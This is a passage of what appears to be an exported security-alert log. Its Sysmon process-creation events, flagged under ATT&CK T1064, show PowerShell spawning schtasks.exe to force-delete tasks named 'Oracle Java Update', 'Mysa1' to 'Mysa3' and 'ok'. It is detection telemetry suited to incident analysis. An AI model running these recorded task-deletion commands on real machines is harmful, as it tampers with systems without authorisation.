Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.387",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.092 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-00105dab2b00} +ProcessId: 1064 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Java Update"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java Update\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.095563900Z"",""eventRecordID"":""3291"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.092\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-00105dab2b00}\r\nProcessId: 1064\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java Update\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.092"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-00105dab2b00}"",""processId"":""1064"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Java Update\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.364",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.064 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-00100ba92b00} +ProcessId: 800 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Oracle Java"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.066481600Z"",""eventRecordID"":""3290"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.064\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-00100ba92b00}\r\nProcessId: 800\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Oracle Java\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.064"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-00100ba92b00}"",""processId"":""800"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Oracle Java\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.342",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.034 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001045a62b00} +ProcessId: 6224 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ok /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ok /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.037882400Z"",""eventRecordID"":""3289"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.034\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001045a62b00}\r\nProcessId: 6224\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ok /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.034"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-001045a62b00}"",""processId"":""6224"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ok /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.321",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.007 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010d9a32b00} +ProcessId: 4672 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.009850400Z"",""eventRecordID"":""3288"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.007\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010d9a32b00}\r\nProcessId: 4672\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.007"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-0010d9a32b00}"",""processId"":""4672"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.298",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:32.984 +ProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010d7a12b00} +ProcessId: 652 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:32.986509600Z"",""eventRecordID"":""3287"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:32.984\r\nProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010d7a12b00}\r\nProcessId: 652\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:32.984"",""processGuid"":""{df9fc3d3-b3d4-5ecf-0000-0010d7a12b00}"",""processId"":""652"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.277",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:32.959 +ProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010c49f2b00} +ProcessId: 6704 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:32.961827200Z"",""eventRecordID"":""3286"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:32.959\r\nProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010c49f2b00}\r\nProcessId: 6704\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:32.959"",""processGuid"":""{df9fc3d3-b3d4-5ecf-0000-0010c49f2b00}"",""processId"":""6704"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 